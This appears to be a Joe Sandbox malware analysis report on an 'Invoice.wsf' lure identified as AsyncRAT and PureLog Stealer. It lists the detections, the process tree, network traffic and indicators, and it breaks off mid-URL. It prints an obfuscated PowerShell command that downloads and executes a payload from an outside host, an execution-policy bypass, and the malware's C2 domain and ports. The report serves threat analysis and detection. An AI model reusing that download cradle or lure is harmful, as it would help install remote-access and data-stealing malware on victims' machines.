Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Invoice.wsf

Overview

General Information

Sample name:Invoice.wsf
Analysis ID:1501359
MD5:0f1b72e0372d3d3e8821218284638861
SHA1:b136b689cb0fbf9558c4b7860ddca264d53c156c
SHA256:20e31873e4b69f416a7c31d9b35be80f8db14e7b28f440a43ca3c294abe892e8
Tags:wsf
Infos:

Detection

AsyncRAT, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected AntiVM3
Yara detected AsyncRAT
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Obfuscated command line found
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6216 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Invoice.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1344 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 2032 cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 5428 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7104 cmdline: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegSvcs.exe (PID: 3592 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Malware Configuration

Threatname: AsyncRAT

{"Server": "kareemovic11.duckdns.org", "Port": "6606,7707,8808", "Version": "AWS | RxR  ", "MutexName": "AsyncMutex_dikojiosidjoishouisddksjmfnldjvfdonlkd", "Autorun": "false", "Group": "true"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
  • 0xe9d30:$x1: AsyncRAT
  • 0xe9d6e:$x1: AsyncRAT

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.1968474602.000002389D3D0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000008.00000002.4121148795.00000000010CA000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x3650b:$x1: AsyncRAT
    • 0x36549:$x1: AsyncRAT
    00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x2aac3:$x1: AsyncRAT
    • 0x2ab01:$x1: AsyncRAT
    • 0x2d18f:$x1: AsyncRAT
    • 0x2d1cd:$x1: AsyncRAT
    00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
      00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Asyncrat_11a11ba1unknownunknown
      • 0x1d894:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
      • 0x21028:$a2: Stub.exe
      • 0x210b8:$a2: Stub.exe
      • 0x1a0d4:$a3: get_ActivatePong
      • 0x1daac:$a4: vmware
      • 0x1d924:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
      • 0x1b041:$a6: get_SslClient
      Click to see the 14 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.powershell.exe.2389d3d0000.2.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        6.2.powershell.exe.2389d3d0000.2.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          6.2.powershell.exe.23886ebeab0.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            6.2.powershell.exe.23886ebeab0.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              6.2.powershell.exe.238854bf788.1.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                Click to see the 9 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Invoice.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6216, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789), ProcessId: 1344, ProcessName: powershell.exe
                Sigma detected: Powerup Write Hijack DLL
                Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1344, TargetFilename: C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat
                Sigma detected: Script Interpreter Execution From Suspicious Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs" , ProcessId: 2032, ProcessName: wscript.exe
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs" , ProcessId: 2032, ProcessName: wscript.exe
                Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
                Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1344, TargetFilename: C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1
                Sigma detected: Change PowerShell Policies to an Insecure Level
                Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'", CommandLine: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5428, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'", ProcessId: 7104, ProcessName: powershell.exe
                Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1344, TargetFilename: C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat
                Sigma detected: Script Initiated Connection
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 192.185.141.13, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6216, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Invoice.wsf", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Invoice.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Invoice.wsf", ProcessId: 6216, ProcessName: wscript.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Invoice.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6216, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789), ProcessId: 1344, ProcessName: powershell.exe
                Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1344, TargetFilename: C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1

                Data Obfuscation

                barindex
                Sigma detected: Powershell Download and Execute IEX
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Invoice.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6216, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789), ProcessId: 1344, ProcessName: powershell.exe

                Suricata Signatures

                Timestamp:2024-08-29T19:42:20.837888+0200
                SID:2842478
                Severity:1
                Source Port:7707
                Destination Port:49738
                Protocol:TCP
                Classtype:Malware Command and Control Activity Detected
                Timestamp:2024-08-29T19:42:20.837888+0200
                SID:2030673
                Severity:1
                Source Port:7707
                Destination Port:49738
                Protocol:TCP
                Classtype:Domain Observed Used for C2 Detected
                Timestamp:2024-08-29T19:42:20.837888+0200
                SID:2035595
                Severity:1
                Source Port:7707
                Destination Port:49738
                Protocol:TCP
                Classtype:Domain Observed Used for C2 Detected
                Timestamp:2024-08-29T19:42:20.837888+0200
                SID:2035607
                Severity:1
                Source Port:7707
                Destination Port:49738
                Protocol:TCP
                Classtype:Domain Observed Used for C2 Detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: kareemovic11.duckdns.orgAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: AsyncRAT {"Server": "kareemovic11.duckdns.org", "Port": "6606,7707,8808", "Version": "AWS | RxR ", "MutexName": "AsyncMutex_dikojiosidjoishouisddksjmfnldjvfdonlkd", "Autorun": "false", "Group": "true"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: unknownHTTPS traffic detected: 192.185.141.13:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.185.141.13:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: Binary string: NewPE2.pdb source: powershell.exe, 00000006.00000002.1968474602.000002389D3D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.0000023886B23000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: NewPE2.pdb(@ source: powershell.exe, 00000006.00000002.1968474602.000002389D3D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.0000023886B23000.00000004.00000800.00020000.00000000.sdmp

                Software Vulnerabilities

                barindex
                Suspicious execution chain found
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 104.243.37.177:7707 -> 192.168.2.4:49738
                Source: Network trafficSuricata IDS: 2030673 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 104.243.37.177:7707 -> 192.168.2.4:49738
                Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 104.243.37.177:7707 -> 192.168.2.4:49738
                Source: Network trafficSuricata IDS: 2035607 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 104.243.37.177:7707 -> 192.168.2.4:49738
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\System32\wscript.exeNetwork Connect: 192.185.141.13 443Jump to behavior
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: kareemovic11.duckdns.org
                Uses dynamic DNS services
                Source: unknownDNS query: name: kareemovic11.duckdns.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.238854bf788.1.raw.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.4:49738 -> 104.243.37.177:7707
                Source: global trafficHTTP traffic detected: GET /rkem.jpg HTTP/1.1Host: afclifescience-tiurma.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 192.185.141.13 192.185.141.13
                Source: Joe Sandbox ViewASN Name: RELIABLESITEUS RELIABLESITEUS
                Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: global trafficHTTP traffic detected: GET /jxs.txt HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: afclifescience-tiurma.comConnection: Keep-Alive
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /jxs.txt HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: afclifescience-tiurma.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /rkem.jpg HTTP/1.1Host: afclifescience-tiurma.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: afclifescience-tiurma.com
                Source: global trafficDNS traffic detected: DNS query: kareemovic11.duckdns.org
                Source: powershell.exe, 00000001.00000002.1718048847.0000021E8F05D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://afclifescience-tiurma.com
                Source: RegSvcs.exe, 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                Source: RegSvcs.exe, 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enqq
                Source: powershell.exe, 00000001.00000002.1740752837.0000021E9D980000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1718048847.0000021E8F44A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000006.00000002.1876842507.0000023885315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000001.00000002.1718048847.0000021E8D911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.00000238850F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000001.00000002.1718048847.0000021E8F0A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: powershell.exe, 00000006.00000002.1876842507.0000023885315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: wscript.exe, 00000000.00000002.1753518951.000002092EA81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://afclifescience-tiurma.LWD
                Source: powershell.exe, 00000001.00000002.1718048847.0000021E8ED7B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1718048847.0000021E8DB31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://afclifescience-tiurma.com
                Source: wscript.exe, 00000000.00000003.1659330673.000002092EA21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753518951.000002092EA1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://afclifescience-tiurma.com/
                Source: wscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659201525.000002092EA54000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659957741.0000020930681000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659367243.000002092EA1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659330673.000002092EA21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1752878264.0000020930686000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659992249.0000020930686000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753518951.000002092EA1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753459649.000002092E8C5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1660024016.0000020930686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://afclifescience-tiurma.com/jxs.txt
                Source: wscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://afclifescience-tiurma.com/jxs.txtLMEMX
                Source: wscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://afclifescience-tiurma.com/jxs.txtWRx
                Source: wscript.exe, 00000000.00000003.1660289317.0000020930687000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659957741.0000020930681000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1659992249.0000020930686000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1660024016.0000020930686000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://afclifescience-tiurma.com/jxs.txtc
                Source: wscript.exe, 00000000.00000003.1659263002.000002092EA81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://afclifescience-tiurma.com/jxs.txtkR
                Source: wscript.exe, 00000000.00000003.1659201525.000002092EA54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://afclifescience-tiurma.com/jxs.txtsC:
                Source: powershell.exe, 00000001.00000002.1717634059.0000021E8BE58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://afclifescience-tiurma.com/rkem.jpg
                Source: powershell.exe, 00000001.00000002.1718048847.0000021E8ED7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://afclifescience-tiurma.com/rkem.jpgX
                Source: powershell.exe, 00000001.00000002.1718048847.0000021E8D911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1876842507.00000238850F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000006.00000002.1876842507.0000023885315000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000001.00000002.1718048847.0000021E8E4DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
